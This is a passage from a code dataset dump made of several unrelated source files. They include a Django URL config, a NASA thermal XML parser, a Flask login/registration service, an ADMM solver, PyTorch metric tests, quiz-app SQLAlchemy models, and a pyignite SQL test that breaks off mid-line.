url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^', include('home.urls')),\n url(r'^manage/', admin.site.urls),\n url(r'^blog/', include('blog.urls')),\n url(r'^redactor/', include('redactor.urls')),\n url(r'^services/speaking/', include('speaking.urls')),\n url(r'^services/healers/', include('healers.urls')),\n url(r'^services/healing-circle/', include('group_coaching.urls')),\n url(r'^services/resources/', include('resources.urls')),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n]\n\nhandler404 = 'home.views.handler404'\nhandler500 = 'home.views.handler500'\n\nadmin.site.site_title = \"Kyeisha Hodge admin\"\nadmin.site.site_header = \"Kyeisha Hodge - Administration\"\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"kh_site/kh_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"294982700","text":"# @copyright Copyright 2019 United States Government as represented by the Administrator of the\n# National Aeronautics and Space Administration. All Rights Reserved.\n#\n####################################################################################################\n## created: Nov 2013\n##\n## @author: Joe Valerioti (L-3 STRATIS) joseph.valerioti@nasa.gov\n####################################################################################################\n## Include all necessary classes.\nfrom XmlEntryAnalyzing import XmlEntryAnalyzer\nfrom XmlParsing import XmlParser, TagNotFound\nfrom ThermSupport import ThermError\n\n#===================================================================================================\n# SourceEntryAnalyzer\n#===================================================================================================\n## @brief:\n## This class contains members used in storing and analyzing xml-data from an entry in an Thermal\n## xml file. The class is passed an xml element from construction, and from\n## this is gathered data about the link. Its functions are inherited from the parent class. They\n## are called externally by IndivNetworkBuilder in validating the user-defined xml-data. \nclass SourceEntryAnalyzer(XmlEntryAnalyzer):\n ## @brief:\n ## Default constructs the object with default, uninitialized members.\n def __init__(self):\n uninitialized = \"[not initialized]\"\n \n ## Base class constructor.\n XmlEntryAnalyzer.__init__(self)\n \n ## The initial temperature of the node.\n self.mLinkType = uninitialized\n\n ## A list of nodes to which this source is linked.\n self.mNodeList = [] \n \n ## Other pieces of data that a source may have \n self.mScalar = None\n self.mArea = None\n self.mAbsorp = None\n self.mInitFlux = None\n #=============================================================================================== \n ## @brief:\n ## Initializes the class using three arguments.\n ## @param[in]: linkType type of link being read \n ## @param[in]: entry ElementTree xml-element of data from Thermal, Htr, or Panel registry\n ## @param[in]: symMap dictionary with the definitions of symbols used in the registries\n def initialize(self, linkType, entry, symMap={}):\n ## The initial temperature of the node.\n self.mLinkType = linkType.lower()\n\n if self.mLinkType != \"heater\" and \\\n self.mLinkType != \"source\" and \\\n self.mLinkType != \"panel\":\n raise ThermError(\"Link type does not exist (%s).\" % self.mLinkType)\n \n ## Base class initializer\n XmlEntryAnalyzer.initialize(self, entry, symMap)\n \n ## Initialize properties specific to ThermalSource entries.\n self.loadData()\n \n ## Raise the flag only if we've made it this far.\n self.mIsInitialized = True \n #----------------------------------------------------------------------------------------------- \n ## Reads and sets data contained in XML.\n def loadData(self):\n ## Get node elements.\n nodeElements = self.mParser.getElements(self.mEntry, \"node\", True)\n \n ## Append nodes to list.\n for nodeElement in nodeElements:\n self.mNodeList.append(self.mParser.getText(nodeElement))\n \n ## The purpose of the following code is to make sure that if a piece of data is provided in\n ## the xml, it is valid. As in, not a string, an invalid expression, or negative.\n self.mScalar = self.getUnrequiredData(self.mEntry, \"scalar\")\n self.mArea = self.getUnrequiredData(self.mEntry, \"area\")\n self.mAbsorp = self.getUnrequiredData(self.mEntry, \"absorp\")\n self.mInitFlux = self.getUnrequiredData(self.mEntry, \"initFlux\")\n","sub_path":"gunns-ts-models/bin/ThermAspectGenerate/SourceEntryAnalyzing.py","file_name":"SourceEntryAnalyzing.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"250907777","text":"# Author: DINDIN Meryll\n# Date: 09 July 2019\n# Project: AsTeR\n\ntry: from service_SQL.schema import *\nexcept: from schema import *\n\ntry: from service_SQL.graphs import *\nexcept: from graphs import *\n\napp = Flask('SQL')\napp.config['SQLALCHEMY_DATABASE_URI'] = format_url('sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n# Change application context to avoid conflict\nwith app.app_context(): dtb.init_app(app)\n\n# API key filter\ndef filter_key(function):\n\n @wraps(function)\n def decorated_function(*args, **kwargs):\n # Load API keys\n with open('configs/api_keys.yaml') as raw: keys = yaml.safe_load(raw)['keys']\n # Check security\n if request.headers.get('apikey') and request.headers.get('apikey') in keys:\n return function(*args, **kwargs)\n else: \n arg = {'status': 200, 'mimetype': 'application/json'}\n msg = {'success': False, 'reason': 'Wrong api key provided'}\n return Response(response=json.dumps(msg), **arg)\n\n return decorated_function\n\n# Obtain the transcript from the STT service\ndef get_transcript(audio_path, key):\n\n fle = {'audio_file': open(audio_path, 'rb')}\n url = '/'.join(['http://servicesql-comedic-wallaby.mybluemix.net', 'run'])\n req = requests.post(url, headers={'apikey': key}, files=fle, params={'api_type': 'IBM'})\n\n try: return json.loads(req.content)\n except: return None\n\n# Determines and updates the paths\ngrp = Trajectory('graphs/sanfrancisco.jb')\n\nif __name__ == '__main__':\n\n @app.route('/connect', methods=['POST'])\n @filter_key\n def connect():\n\n boo, req = False, parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n usr = User.query.filter_by(username=req['username']).first()\n\n if usr is None:\n boo = False\n err = 'Username is not registered' \n elif not sha256_crypt.verify(usr.password, req['password']):\n boo = False\n err = 'Password was wrongly inputed'\n else:\n boo = True\n err = 'None'\n\n msg = {'username': req['username'], 'success': boo, 'reason': err}\n if boo: msg.update({'first_name': usr.firstname, 'last_name': usr.lastname})\n return Response(response=json.dumps(msg), **arg)\n\n @app.route('/register', methods=['POST'])\n @filter_key\n def register():\n\n req = parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n \n usr = User.query.filter_by(username=req['username']).first()\n if not usr is None:\n msg = {'username': req['username'], 'success': False, 'reason': 'Username is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n eml = User.query.filter_by(email=req['email']).first()\n if not eml is None:\n msg = {'username': req['username'], 'success': False, 'reason': 'Email adress is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n dtb.session.add(User(**req))\n dtb.session.commit()\n msg = {'username': req['username'], 'success': True, 'reason': 'None'}\n return Response(response=json.dumps(msg), **arg)\n\n @app.route('/get_call', methods=['POST'])\n @filter_key\n def get_call():\n\n res, arg = dict(), parse_arguments(request)\n lst = Call.query.filter(Call.time <= arg['timing'])\n\n for call in lst:\n req = call.__dict__.copy()\n for key in ['call_id', '_sa_instance_state']: del req[key]\n res[call.call_id] = req\n\n arg = {'status': 200, 'mimetype': 'application/json'}\n return Response(response=json.dumps(res), **arg)\n\n @app.route('/get_unit', methods=['POST'])\n @filter_key\n def get_unit():\n\n def update_units():\n\n lst = Unit.query.all()\n for unit in [unit for unit in lst if unit.target != 'none']:\n pos = grp.closest_key(unit.latitude, unit.longitude)\n obj = grp.closest_key(*[float(x) for x in unit.target.split(':')])\n # Update object\n setattr(unit, 'path', '|'.join(grp.shortest_path(pos, obj)))\n dtb.session.add(unit)\n dtb.session.commit()\n # Memory efficiency\n del pos, obj\n\n update_units()\n res, lst = dict(), Unit.query.all()\n\n for unit in lst:\n req = unit.__dict__.copy()\n for key in ['unit_id', '_sa_instance_state']: del req[key]\n res[unit.unit_id] = req\n\n arg = {'status': 200, 'mimetype': 'application/json'}\n return Response(response=json.dumps(res), **arg)\n\n @app.route('/add_unit', methods=['POST'])\n @filter_key\n def add_unit():\n\n req = parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n\n unt = Unit.query.filter_by(unit_id=req['unit_id']).first()\n if not unt is None: \n msg = {'success': False, 'reason': 'Unit ID is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n dtb.session.add(Unit(**req))\n dtb.session.commit()\n msg = {'unit_id': req['unit_id'], 'success': True, 'reason': 'None'}\n return Response(response=json.dumps(msg), **arg)\n\n app.run(host='0.0.0.0', port=int(os.getenv('PORT', 8000)), threaded=True)\n # app.run(host='127.0.0.1', port=8080, threaded=True)","sub_path":"service_SQL/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"445582539","text":"import numpy as np\nfrom scipy import interpolate, sparse\nfrom numpy.linalg import norm\nfrom scipy.linalg import block_diag\nfrom cvxopt import matrix, solvers\nfrom itertools import combinations\nimport cvxpy as cp\nfrom LCADMM.node import ADMM_var\nfrom LCADMM.constants import *\nimport pdb\n\nclass ADMM_problem():\n def __init__(self,beta = ADMM_BETA):\n self.N = 0\n self.vars = []\n self.ndx = {}\n self.vardim = 0\n self.x_sol = None\n self.beta = ADMM_BETA\n def add_agent(self,agent):\n self.N+=1\n self.vars.append(agent)\n self.ndx[agent]=self.vardim\n self.vardim+=agent.dim\n def Add_ineq_cons(self,vars,As,b):\n if isinstance(vars,ADMM_var):\n if vars not in self.vars:\n self.add_agent(vars)\n vars.Add_ineq_cons(None,As,None,b)\n elif isinstance(vars,list):\n M = len(vars)\n for Ai in As:\n Ai = Ai/M\n b = b/M\n # pdb.set_trace()\n for var in vars:\n if var not in self.vars:\n self.add_agent(var)\n if M==1:\n vars[0].Add_ineq_cons(None,As[0],None,b)\n elif M==2:\n vars[0].Add_ineq_cons(vars[1],As[0],As[1],b)\n vars[1].Add_ineq_cons(vars[0],As[1],As[0],b)\n else:\n for i in range(0,len(vars)):\n subvar = vars[0:i]+vars[i+1:]\n subAs = As[0:i]+As[i+1:]\n var.Add_ineq_cons(subvar,As[i],subAs,b)\n\n def solve(self,maxiter = 1e6, tol = 1e-4):\n iter = 0\n err = 1.\n for var in self.vars:\n var.solve_local_QP(self.beta)\n # pdb.set_trace()\n while iter<maxiter and err>tol:\n err = 0.\n iter +=1\n # print(self.vars[0].y1[self.vars[0].NB[0]])\n # print(self.vars[0].x_sol[0:2])\n # print(self.vars[0].f[0:2])\n for var in self.vars:\n\n if ADMM_ADAPTIVE:\n delta_x = var.x_sol[0:var.total_dim]-var.x_sol_old\n hh = 0\n hh +=(var.p+ADMM_RHO*var.N_nb)*norm(delta_x)**2\n du = hh\n for var1 in var.NB:\n\n dx = (var.x_sol[var.ndx[var1]:var.ndx[var1]+var1.dim]-var1.x_sol[var1.ndx[var1]:var1.ndx[var1]+var1.dim]).flatten()\n if ADMM_ADAPTIVE:\n hh+=norm(dx)**2*(2-ADMM_GAMMA)*ADMM_RHO+2*ADMM_RHO*dx.dot(delta_x[var.ndx[var1]:var.ndx[var1]+var1.dim])\n du +=ADMM_RHO*ADMM_GAMMA*norm(dx)**2\n var.y1[var1]+=ADMM_GAMMA*ADMM_RHO*dx/var1.x_norm\n var1.y2[var] = var.y1[var1]\n var1.z[var] = var.x_sol[var.ndx[var]:var.ndx[var]+var.dim].flatten()\n\n err = max(err,norm(dx/var1.x_norm))\n # if norm(dx/var1.x_norm)>1.5:\n # print(var.y1[var1])\n # if iter>60 and norm(dx/var1.x_norm)>1.9:\n # pdb.set_trace()\n if ADMM_ADAPTIVE:\n if hh<0.5*du:\n var.p+=ADMM_q\n if err<=tol:\n break\n print(err)\n for var in self.vars:\n var.solve_local_QP(self.beta)\n # pdb.set_trace()\n self.x_sol = np.zeros(self.vardim)\n for var in self.vars:\n self.x_sol[self.ndx[var]:self.ndx[var]+var.dim]= var.x_sol[var.ndx[var]:var.ndx[var]+var.dim].flatten()\n return self.x_sol\n def solve_centralized(self):\n ndx = {}\n dim = 0\n for var in self.vars:\n ndx[var] = dim\n dim+=var.dim\n Ac = np.empty([0,dim])\n bc = np.empty(0)\n for var in self.vars:\n Aci = np.zeros([var.Ac.shape[0],dim])\n bci = var.bc\n Aci[:,ndx[var]:ndx[var]+var.dim] = var.Ac\n Ac = np.vstack((Ac,Aci))\n bc = np.append(bc,bci)\n Ain = np.empty([0,dim])\n bin = np.empty(0)\n pairs = combinations(self.vars,2)\n for pair in pairs:\n var0 = pair[0]\n var1 = pair[1]\n if var1 in var0.NB:\n idx = np.where((var0.A[:,var0.ndx[var1]:var0.ndx[var1]+var1.dim]!=0).any(axis=1))[0]\n Anew = np.zeros([idx.shape[0],dim])\n Anew[:,ndx[var0]:ndx[var0]+var0.dim] = var0.A[idx,var0.ndx[var0]:var0.ndx[var0]+var0.dim]\n Anew[:,ndx[var1]:ndx[var1]+var1.dim] = var0.A[idx,var0.ndx[var1]:var0.ndx[var1]+var1.dim]\n bnew = var0.b[idx]\n Ain = np.vstack((Ain,Anew))\n bin = np.append(bin,bnew)\n\n ns = Ain.shape[0]\n Ac = np.hstack((Ac,np.zeros([Ac.shape[0],ns])))\n Ain = np.hstack((Ain,-np.eye(ns)))\n Ain1 = np.hstack((np.zeros([ns,dim]),-np.eye(ns)))\n Ain = np.vstack((Ain,Ain1))\n bin = np.append(bin,np.zeros(ns))\n\n Q = np.zeros([dim+ns,dim+ns])\n for var in self.vars:\n Q[ndx[var]:ndx[var]+var.dim,ndx[var]:ndx[var]+var.dim]=np.diag(1/var.x_norm**2)\n f = np.zeros(dim+ns)\n for var in self.vars:\n f[ndx[var]:ndx[var]+var.dim]=-var.x_des/(var.x_norm**2)\n f[dim:dim+ns] = 2*self.beta\n\n G = np.vstack((Ac,Ain))\n h = np.append(bc,bin)\n sol=solvers.qp(matrix(Q), matrix(f), matrix(G), matrix(h))\n print(sol['primal objective'])\n x_sol = np.array(sol['x']).flatten()[0:dim]\n return x_sol\n\n def solve_constrained_centralized(self,exp_relax = False):\n if not exp_relax:\n ndx = {}\n con_ndx = {}\n dim = 0\n Q = np.empty([0,0])\n f = np.empty(0)\n G = np.empty([0,0])\n h = np.empty(0)\n for var in self.vars:\n\n if not var.opt_ready:\n var.generate_local_QP(self.beta)\n ndx[var] = dim\n dim += var.vardim\n var.Q = np.zeros([var.vardim,var.vardim])\n var.f = np.zeros(var.vardim)\n\n var.Q[var.ndx[var]:var.ndx[var]+var.dim,var.ndx[var]:var.ndx[var]+var.dim]=np.diag(1/var.x_norm**2)\n\n\n var.f[var.ndx[var]:var.ndx[var]+var.dim] += -var.x_des/(var.x_norm**2)\n var.f[var.ndx['s']:var.ndx['s']+var.ns] = self.beta*np.ones(var.ns)\n\n Q = block_diag(Q,var.Q)\n f = np.append(f,var.f)\n G = block_diag(G,var.G)\n h = np.append(h,var.h)\n\n vardim = dim\n # A = np.empty([0,vardim])\n # b = np.empty(0)\n condim = G.shape[0]\n\n for var in self.vars:\n for var1 in var.NB:\n con_ndx[(var, var1)] = condim\n Anew = np.zeros([var1.dim*2,vardim])\n Anew[0:var1.dim,ndx[var]+var.ndx[var1]:ndx[var]+var.ndx[var1]+var1.dim] = np.eye(var1.dim)\n Anew[0:var1.dim,ndx[var1]+var1.ndx[var1]:ndx[var1]+var1.ndx[var1]+var1.dim] = -np.eye(var1.dim)\n\n Anew[var1.dim:2*var1.dim,ndx[var]+var.ndx[var1]:ndx[var]+var.ndx[var1]+var1.dim] = -np.eye(var1.dim)\n Anew[var1.dim:2*var1.dim,ndx[var1]+var1.ndx[var1]:ndx[var1]+var1.ndx[var1]+var1.dim] = np.eye(var1.dim)\n\n G = np.vstack((G,Anew))\n h = np.append(h,np.zeros(2*var1.dim))\n\n condim = G.shape[0]\n sol=solvers.qp(matrix(Q), matrix(f), matrix(G), matrix(h))\n print(sol['primal objective'])\n sol_x = np.array(sol['x']).flatten()\n sol_z = np.array(sol['z']).flatten()\n x_sol = np.empty(0)\n y_sol = {}\n for var in self.vars:\n x_sol = np.append(x_sol,sol_x[ndx[var]+var.ndx[var]:ndx[var]+var.ndx[var]+var.dim])\n for var1 in var.NB:\n y1 = sol_z[con_ndx[(var,var1)]:con_ndx[(var,var1)]+var1.dim]\n y2 = sol_z[con_ndx[(var,var1)]+var1.dim:con_ndx[(var,var1)]+2*var1.dim]\n y_sol[(var,var1)] = y1-y2\n else:\n\n cost = cp.sum(0)\n cons = []\n xs = {}\n\n for var in self.vars:\n\n if not var.opt_ready:\n var.generate_local_QP(self.beta)\n xs[var] = cp.Variable(var.total_dim)\n cost += 0.5*cp.sum_squares(xs[var][var.ndx[var]:var.ndx[var]+var.dim]-var.x_des)\n for i in range(0,var.ns):\n Aib = var.A[i,:]@ xs[var]-var.b[i]\n cost += self.beta*cp.log_sum_exp(cp.vstack([ADMM_ETA*Aib,0]))/ADMM_ETA\n cons += [var.Ac@xs[var][var.ndx[var]:var.ndx[var]+var.dim]<=var.bc]\n\n con_ndx = {}\n for var in self.vars:\n for var1 in var.NB:\n con_ndx[(var,var1)] = len(cons)\n cons += [xs[var][var.ndx[var1]:var.ndx[var1]+var1.dim]==xs[var1][var1.ndx[var1]:var1.ndx[var1]+var1.dim]]\n\n prob = cp.Problem(cp.Minimize(cost),cons)\n prob.solve()\n\n\n x_sol = np.empty(0)\n y_sol = {}\n for var in self.vars:\n x_sol = np.append(x_sol,xs[var][var.ndx[var]:var.ndx[var]+var.dim].value)\n for var1 in var.NB:\n y_sol[(var,var1)] = cons[con_ndx[(var,var1)]].dual_value\n\n return x_sol,y_sol\n","sub_path":"LCADMM/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290651475","text":"import torch\nimport unittest\n\nfrom snow.metrics import F1, FBeta, Perplexity\n\n\nclass TestMetrics(unittest.TestCase):\n def test_ppl(self):\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 2, 3])\n weight = torch.ones(targets.size())\n ignore_index = 0\n ppl = Perplexity(weight, ignore_index)\n\n loss1 = ppl(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0]]\n )\n\n loss2 = ppl(inputs, targets, return_metric=True)\n\n self.assertTrue(loss1 < loss2)\n\n def test_fbeta(self):\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 2, 3])\n\n fbeta = FBeta(1)\n\n loss1 = fbeta(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[0, 0, 0, 1.0], [1.0, 0, 0, 0], [1.0, 0, 0, 0], [1.0, 0, 0, 0]]\n )\n\n loss2 = fbeta(inputs, targets, return_metric=True)\n\n self.assertTrue(loss1[\"fscore\"] > loss2[\"fscore\"])\n\n def test_f1(self):\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 2, 3])\n\n f1 = F1(0)\n\n _, _, fs1 = f1(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[0, 0, 0, 1.0], [1.0, 0, 0, 0], [1.0, 0, 0, 0], [1.0, 0, 0, 0]]\n )\n\n _, _, fs2 = f1(inputs, targets, return_metric=True)\n\n self.assertTrue(fs1 > fs2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"611895865","text":"__version__ = \"1.0dev\"\n\n# chambers of congress\n\nHOUSE = 1\nSENATE = 2\n\nCHAMBERS = {\n 'H': HOUSE,\n 'S': SENATE,\n}\n\n# political parties\n\nDEMOCRAT = 1\nREPUBLICAN = 2\nINDEPENDENT = 3\n\nPARTIES = {\n 'D': DEMOCRAT,\n 'R': REPUBLICAN,\n 'I': INDEPENDENT,\n}\n\n__all__ = [\n 'CHAMBERS', 'HOUSE', 'SENATE',\n 'PARTIES', 'DEMOCRAT', 'REPUBLICAN', 'INDEPENDENT',\n]","sub_path":"citizendialer3000/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381479215","text":"import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom app import db\n# db = SQLAlchemy()\n\n# User==================================================\nclass Users(db.Model):\n __tablename__ = 'users'\n\n user_id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String())\n password = db.Column(db.String())\n email = db.Column(db.String())\n quiz = db.relationship('Quizzes', cascade='all,delete', backref='users', lazy=True)\n \n\n def __init__(self, username, password, email):\n self.username = username\n self.password = password\n self. email = email\n\n def __repr__(self):\n return '<user id {}>'.format(self.user_id)\n \n def serialize(self):\n return{\n 'user_id': self.user_id,\n 'username': self.username,\n 'password': self.password,\n 'email': self.email,\n 'quiz' : [{'quiz_name':item.quiz_name, 'quiz_category':item.quiz_category } for item in self.quiz]\n }\n# =========================================================\n\n# Quizzes =================================================\nclass Quizzes(db.Model):\n __tablename__ = 'quizzes'\n\n quiz_id = db.Column(db.Integer, primary_key=True)\n creator_id = db.Column(db.Integer, db.ForeignKey('users.user_id'), nullable=False)\n quiz_name = db.Column(db.String())\n quiz_category = db.Column(db.String())\n questions = db.relationship('Questions',cascade='all,delete', backref='quizzes', lazy=True) \n\n def __init__(self, creator_id, quiz_name, quiz_category):\n self.creator_id = creator_id\n self.quiz_name = quiz_name\n self.quiz_category = quiz_category\n \n def __repr__(self):\n return'<quiz id {}>'.format(self.quiz_id)\n \n def serialize(self):\n return{\n 'quiz_id' : self.quiz_id,\n 'creator_id' : self.creator_id,\n 'quiz_name' : self.quiz_name,\n 'quiz_category' : self.quiz_category,\n # 'question_list' : [{'answer':item.answer, 'question':item.question, 'question_number':item.question_number} for item in self.question_list]\n }\n# ==========================================================\n# Questions ================================================\nclass Questions(db.Model):\n __tablename__ = \"questions\"\n\n question_id = db.Column(db.Integer, primary_key=True)\n quiz_id = db.Column(db.Integer, db.ForeignKey('quizzes.quiz_id'), nullable=False)\n question_number = db.Column(db.Integer())\n question = db.Column(db.String())\n answer = db.Column(db.String())\n option_list = db.relationship('OptionList', cascade='all,delete', backref='questions', lazy=True)\n\n def __init__(self, question_id, quiz_id, question_number, question, answer):\n \n self.question_id = question_id\n self.quiz_id = quiz_id\n self.question_number = question_number\n self.question = question\n self.answer = answer\n \n def __repr__(self):\n return'<question id {}>'.format(self.question_id)\n\n def serialize(self):\n return{\n # 'question_id' : self.question_id,\n 'quiz_id' : self.quiz_id,\n 'question_id' : self.question_id,\n 'question_number' : self.question_number,\n 'question' : self.question,\n 'answer' : self.answer,\n 'option_list' : [{'a':item.a, 'b':item.b, 'c':item.c, 'd':item.d, 'question_id': item.question_id } for item in self.option_list]\n }\n\n# Options List ==============================================\nclass OptionList(db.Model):\n __tablename__ = \"option_list\"\n\n option_id = db.Column(db.Integer, primary_key=True)\n question_id = db.Column(db.Integer,db.ForeignKey('questions.question_id'), nullable=False)\n a = db.Column(db.String())\n b = db.Column(db.String())\n c = db.Column(db.String())\n d = db.Column(db.String())\n\n def __init__(self, option_id, question_id, a, b, c, d):\n self.option_id = option_id\n self.question_id = question_id\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n \n def __repr__(self):\n return'<option id {}>'.format(self.option_id)\n\n def serialize(self):\n return {\n 'option_id' : self.option_id,\n 'question_id' : self.question_id,\n 'a' : self.a,\n 'b' : self.b,\n 'c' : self.c,\n 'd' : self.d\n }\n# ===========================================================\n\n# Game =====================================================\nclass Game(db.Model):\n __tablename__ = 'game'\n\n game_pin = db.Column(db.Integer, primary_key=True)\n quiz_id = db.Column(db.Integer, db.ForeignKey('quizzes.quiz_id'), nullable=False)\n quizzes = db.relationship('Quizzes', cascade='all,delete', backref='game', lazy=True)\n\n \n\n def __init__(self, game_pin, quiz_id):\n self.game_pin = game_pin\n self.quiz_id = quiz_id\n\n def __repr__(self):\n return'<game pin {}>'.format(self.game_pin)\n\n def serialize(self):\n return {\n 'game_pin' : self.game_pin,\n 'quiz_id' : self.quiz_id,\n # 'quiz' : [{'quiz_name':item.quiz_name, 'quiz_category':item.quiz_category } for item in self.quiz]\n }\n\n# Leaderboard =================================================\nclass Leaderboard(db.Model):\n __tablename__ = \"leaderboard\"\n game_pin = db.Column(db.Integer())\n score = db.Column(db.Integer())\n player_name = db.Column(db.String, primary_key=True)\n\n def __init__(self, game_pin, score, player_name):\n self.game_pin = game_pin\n self.score = score\n self.player_name = player_name\n\n def __repr__(self):\n return'<player name {}>'.format(self.player_name)\n\n def serialize(self):\n return {\n 'game_pin' : self.game_pin,\n 'score' : self.score,\n 'player_name' : self.player_name\n } ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"638129446","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import OrderedDict\nfrom enum import Enum\n\nimport pytest\n\nfrom pyignite import GenericObjectMeta, AioClient\nfrom pyignite.datatypes import IntObject, String\n\n\nclass StudentKey(\n metaclass=GenericObjectMeta,\n type_name='test.model.StudentKey',\n schema=OrderedDict([\n ('ID', IntObject),\n ('DEPT', String)\n ])\n):\n pass\n\n\nclass Student(\n metaclass=GenericObjectMeta,\n type_name='test.model.Student',\n schema=OrderedDict([\n ('NAME', String),\n ])\n):\n pass\n\n\ncreate_query = '''CREATE TABLE StudentTable (\n id INT(11),\n dept VARCHAR,\n name CHAR(24),\n PRIMARY KEY (id, dept))\n WITH \"CACHE_NAME=StudentCache, KEY_TYPE=test.model.StudentKey, VALUE_TYPE=test.model.Student\"'''\n\ninsert_query = '''INSERT INTO StudentTable (id, dept, name) VALUES (?, ?, ?)'''\n\nselect_query = 'SELECT id, dept, name FROM StudentTable'\n\nselect_kv_query = 'SELECT _key, _val FROM StudentTable'\n\ndrop_query = 'DROP TABLE StudentTable IF EXISTS'\n\n\n@pytest.fixture\ndef student_table_fixture(client):\n yield from __create_student_table_fixture(client)\n\n\n@pytest.fixture\nasync def async_student_table_fixture(async_client):\n async for _ in __create_student_table_fixture(async_client):\n yield\n\n\ndef __create_student_table_fixture(client):\n def inner():\n client.sql(drop_query)\n client.sql(create_query)\n yield None\n client.sql(drop_query)\n\n async def inner_async():\n await client.sql(drop_query)\n await client.sql(create_query)\n yield None\n await client.sql(drop_query)\n\n return inner_async() if isinstance(client, AioClient) else inner()\n\n\nclass InsertMode(Enum):\n SQL = 1\n CACHE = 2\n\n\n@pytest.mark.parametrize('insert_mode', [InsertMode.SQL, InsertMode.CACHE])\ndef test_sql_composite_key(client, insert_mode, student_table_fixture):\n __perform_test(client, insert_mode)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('insert_mode', [InsertMode.SQL, InsertMode.CACHE])\nasync def test_sql_composite_key_async(async_client, insert_mode, async_student_table_fixture):\n await __perform_test(async_client, insert_mode)\n\n\ndef __perform_test(client, insert=InsertMode.SQL):\n student_key = StudentKey(2, 'Business')\n student_val = Student('Abe')\n\n def validate_query_result(key, val, query_result):\n \"\"\"\n Compare query result with expected key and value.\n \"\"\"\n assert len(query_result) == 2\n sql_row = dict(zip(query_result[0], query_result[1]))\n\n assert sql_row['ID'] == key.ID\n assert sql_row['DEPT'] == key.DEPT\n assert sql_row['NAME'] == val.NAME\n\n def validate_kv_query_result(key, val, query_result):\n \"\"\"\n Compare query result with expected key and value.\n \"\"\"\n assert len(query_result) == 2\n sql_row = dict(zip(query_result[0], query_result[1]))\n\n sql_key, sql_val = sql_row['_KEY'], sql_row['_VAL']\n assert sql_key.ID == key.ID\n assert sql_key.DEPT == key.DEPT\n assert sql_val.NAME == val.NAME\n\n def inner():\n if insert == InsertMode.SQL:\n result = client.sql(insert_query, query_args=[student_key.ID, student_key.DEPT, student_val.NAME])\n assert next(result)[0] == 1\n else:\n studentCache = client.get_cache('StudentCache')\n studentCache.put(student_key, student_val)\n val = studentCache.get(student_key)\n assert val is not None\n assert val.NAME == student_val.NAME\n\n query_result = list(client.sql(select_query, include_field_names=True))\n validate_query_result(student_key, student_val, query_result)\n\n query_result = list(client.sql(select_kv_query, include_field_names=True))\n validate_kv_query_result(student_key, student_val, query_result)\n\n async def inner_async():\n if insert == InsertMode.SQL:\n result = await client.sql(insert_query, query_args=[student_key.ID, student_key.DEPT, student_val.NAME])\n assert (await result.__anext__())[0] == 1\n else:\n studentCache = await client.get_cache('StudentCache')\n await studentCache.put(student_key, student_val)\n val = await studentCache.get(student_key)\n assert val is not None\n assert val.NAME == student_val.NAME\n\n async with client.sql(select_query, 